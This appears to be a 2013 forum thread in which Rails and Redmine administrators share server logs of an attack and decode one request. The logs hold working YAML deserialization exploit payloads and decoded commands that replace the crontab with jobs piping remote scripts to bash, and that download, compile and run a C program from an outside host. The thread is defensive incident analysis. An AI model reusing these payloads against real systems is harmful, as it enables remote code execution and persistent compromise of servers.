 17837: 88.198.20.247 - - [24/May/2013:23:10:02 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgI3AXN5c3RlbSgnY3JvbnRhYiAtcjsgZWNobyAiMSAqICogKiAqIHdnZXQgLU8gLSBjb2xrb2xkdWxkLmNvbS9jbWQxfGJhc2g7d2dldCAtTyAtIGxvY2hqb2wuY29tL2NtZDJ8YmFzaDt3Z2V0ICAtTyAtIGRkb3MuY2F0LmNvbS9jbWQzfGJhc2g7Inxjcm9udGFiIC07d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQoKBjoGRVQ6DEBtZXRob2Q6C3Jlc3VsdA%253D%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4142 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17838: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 894 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17839: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3790 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17840: 88.198.20.247 - - [24/May/2013:23:10:03 +0200] "POST / HTTP/1.1" 302 1020 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17841: 88.198.20.247 - - [24/May/2013:23:10:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3880 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17842  80.108.82.117 - - [25/May/2013:00:01:49 +0200] "f\xA9\xA4\xFAo\x7F\xD0\xD6\xCB\x05\x83T\x82\xE7\x18\xDF\xD9p\x94\x80\xA6FY89g;\xDA}\xFDE9A\xF1P|\xBB\xF1\xA9\xFD\xE0\xDB\xCC_\x9A\x9C1\x89t\xADj\x10\xED\x9B\xF4\x8E*\xB8\x941\xF5+\x0B.&\xC5\x97,Q\xB8\x04\x85" 400 166 "-" "-" "-"

Here (I don't know how..) he compiled the C program. (for me "k.c" & "sh.py")
And he tries to access my root account.

nginx/error.log

 1848  /home/my_login/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.
 1849: --2013-05-24 21:14:01--  http://88.198.20.247/k.c
 1850: Connecting to 88.198.20.247:80... connected.
 1851  HTTP request sent, awaiting response... 200 OK
 1852  Length: 18854 (18K) [text/x-csrc]
 ....
 1858  
 1859  /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
 1860: Lockfile found. Exiting.--2013-05-24 21:14:04--  http://88.198.20.247/k.c
 1861: Connecting to 88.198.20.247:80... connected.
 1862  HTTP request sent, awaiting response... 200 OK
 1863  Length: 18854 (18K) [text/x-csrc]
 ....
 1878  [ pid=856 thr=3065412416 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:49:42.117 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
 1879  [ pid=856 thr=3066215232 file=ext/nginx/HelperAgent.cpp:923 time=2013-05-24 21:50:29.5 ]: Couldn't forward the HTTP response back to the HTTP client: It seems the user clicked on the 'Stop' button in his browser.
 1880: --2013-05-24 23:10:00--  http://88.198.20.247/k.c
 1881: Connecting to 88.198.20.247:80... connected.
 1882  HTTP request sent, awaiting response... 200 OK
 1883  Length: 18854 (18K) [text/x-csrc]
 ....
 1889  
 1890  /tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
 1891: Lockfile found. Exiting.--2013-05-24 23:10:02--  http://88.198.20.247/k.c
 1892: Connecting to 88.198.20.247:80... connected.
 1893  HTTP request sent, awaiting response... 200 OK
 1894  Length: 18854 (18K) [text/x-csrc]

 1906  HTTP request sent, awaiting response... 200 OK
 1907  Length: 2252 (2.2K) [text/plain]
 1908: Saving to: `/tmp/sh.py'
 1909  
 1910       0K ..                                                    100% 7.73M=0s
 1911  
 1912: 2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]
 1913  
 1914  sudo: no tty present and no askpass program specified

2013-05-24 23:10:02 (218 KB/s) - `/tmp/k.c' saved [18854/18854]

/tmp/k.c:91:6: warning: conflicting types for built-in function 'pow' [enabled by default]
Lockfile found. Exiting.Lockfile found. Exiting.sh: 1: Syntax error: "(" unexpected
--2013-05-25 00:36:29--  http://starfall.cu.cc/chips.txt
Resolving starfall.cu.cc (starfall.cu.cc)... 37.221.166.32
Connecting to starfall.cu.cc (starfall.cu.cc)|37.221.166.32|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2252 (2.2K) [text/plain]
Saving to: `/tmp/sh.py'

     0K ..                                                    100% 7.73M=0s

2013-05-25 00:36:30 (7.73 MB/s) - `/tmp/sh.py' saved [2252/2252]

sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
telnet: Unable to connect to remote host: Connection refused
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
telnet: Unable to connect to remote host: Connection refused
Connection closed by foreign host.
Connection closed by foreign host.
Connection closed by foreign host.
/home/remy/.rvm/gems/ruby-1.9.3-p327/gems/activesupport-3.2.9/lib/active_support/dependencies.rb:251:in `block in require': iconv will be deprecated in the future, use String#encode instead.

I saw the "k.c" and i have the impression, he uses irc server... in "cvv4you.ru" & "188.190.124.120" -> channel '#rails'
He runs the program with a fake name "- bash" I saw that in the process list with htop

I think we have to warm all RoR developers...

Salut Remy,

Thanks for putting your log because I found something really interesting in the GET /login?back_url= request that you pointed out:

The 'back_url' is URL encodded twice:

$ irb
1.9.3p392 :002 > s = '/login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A'

1.9.3p392 :003 > CGI.unescape s
=> "/login?back_url=http://82.239.203.55/?id=%0A---%0A%21ruby%2Fobject%3AGem%3A%3ARequirement%0Arequirements%3A%0A++-+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3AAbstract%3A%3ASessionHash%0A++++++env%3A%0A++++++++HTTP_COOKIE%3A+%22a%3DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%22%0A++++++by%3A+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3ACookie%0A++++++++coder%3A+%21ruby%2Fobject%3ARack%3A%3ASession%3A%3ACookie%3A%3ABase64%3A%3AMarshal+%7B%7D%0A++++++++key%3A+a%0A++++++++secrets%3A+%5B%5D%0A++++++exists%3A+true%0A"

1.9.3p392 :004 > CGI.unescape CGI.unescape s
=> "/login?back_url=http://82.239.203.55/?id=\n---\n!ruby/object:Gem::Requirement\nrequirements:\n - !ruby/object:Rack::Session::Abstract::SessionHash\n env:\n HTTP_COOKIE: "a=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0"\n by: !ruby/object:Rack::Session::Cookie\n coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}\n key: a\n secrets: []\n exists: true\n"

Then the 'HTTP_COOKIE' is base64 blob :

$ base64 -d <(echo BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0)
o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy:@instanceoERB: @srcI"�system('crontab -r')
system('(crontab -l ; echo "1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k") | crontab -')
system('wget -O /dev/null 188.190.124.120/req/log.php')
:ET:
@method:
resu

And so we can see that with this specially crafted request, the bad guy is able to run Ruby code which erase user-level crontab replacing by its own crontab.

I don't know exactely how it work, it might me related to rack security issue disclosed earlier this year (or perhaps undisclosed vulnerability...).

Thanks again for the log!

Regards.

Hello,

It's pleasure, as we know now what it is about. :)

Regards

In my case it was PhpMyAdmin. 92.37.71.185 started probing my server starting about 10 hours ago.

What version is your Redmine?
Redmine 2.3.1 uses Rails 3.2.13.
http://www.redmine.org/projects/redmine/repository/entry/tags/2.3.1/Gemfile#L3

Redmine provides Security Advisories.
http://www.redmine.org/projects/redmine/wiki/Security_Advisories
Did you check it?

My version is 2.2.
No I'm not checking that before, I should have... :/
I still did ticket on redmine.org (http://www.redmine.org/issues/14152).

@Leglaw : What is your PhPMyAdmin version ?

2.2.x?
2.2.3 has Ruby on Rails vulnerability.

Regarding me I am on Rails 3.2.8 with custom application.

I have spotted 3 IPs which were sending malicious request to one of our server:
88.198.20.247
95.138.186.181
188.190.126.105

The malicious requests are messing with YAML parameters and Session Cookie.
Here is some extracts of the log with malicious request:

from 88.198.20.247:

Started GET "/" for 88.198.20.247 at 2013-05-24 12:50:17 +0000
Processing by PagesController#show as HTML
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.8ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:14 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.4ms)
Rendered layouts/_social_links.html.erb (2.8ms)
Rendered layouts/_messages.html.haml (3.6ms)
Rendered layouts/_header.html.erb (1.7ms)
Rendered layouts/_menu.html.erb (0.9ms)
Rendered layouts/_my_favs.html.haml (4.5ms)

Rendered layouts/_ride_request_form.html.erb (15.2ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:15 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (6.2ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.8ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (4.5ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 15:05:16 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (4.3ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.9ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:30 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (91.0ms)
Rendered layouts/_head.html.erb (7.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (3.9ms)
Rendered layouts/_header.html.erb (1.5ms)
Rendered layouts/_menu.html.erb (0.5ms)
Rendered layouts/_my_favs.html.haml (4.4ms)

Rendered layouts/_ride_request_form.html.erb (14.3ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:33 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.7ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:34 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:42 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (93.0ms)
Rendered layouts/_head.html.erb (6.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (2.9ms)
Rendered layouts/_header.html.erb (1.3ms)
Rendered layouts/_menu.html.erb (0.4ms)
Rendered layouts/_my_favs.html.haml (4.0ms)

Rendered layouts/_ride_request_form.html.erb (13.2ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:44 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.8ms)
Rendered layouts/_head.html.erb (5.1ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:45 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.3ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:12 +0000
Rendered /home/ggr/apps/ggr-dispatch/shared/bundle/ruby/1.9.1/gems/activeadmin-0.5.1/app/views/active_admin/resource/index.html.arb (3005.1ms)
Completed 200 OK in 3309ms (Views: 3197.3ms | ActiveRecord: 40.3ms)
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (86.6ms)
Rendered layouts/_head.html.erb (7.4ms)
Rendered layouts/_social_links.html.erb (4.2ms)
Rendered layouts/_messages.html.haml (4.0ms)
Rendered layouts/_header.html.erb (1.7ms)

Rendered layouts/_menu.html.erb (0.5ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
Error occurred while parsing request parameters.
Contents:

SyntaxError ((eval):1: syntax error, unexpected tFLOAT, expecting $end
wget http://88.198.20.247/k.c -O /tmp/k.c; gcc ...
^):
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:in eval'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:indefine_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:in module_eval'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:indefine_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:166:in block in define_named_route_methods'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:ineach'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:in define_named_route_methods'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:115:inadd'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych/visitors/to_ruby.rb:273:in `block in revive_hash'

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
Processing by PagesController#show as /
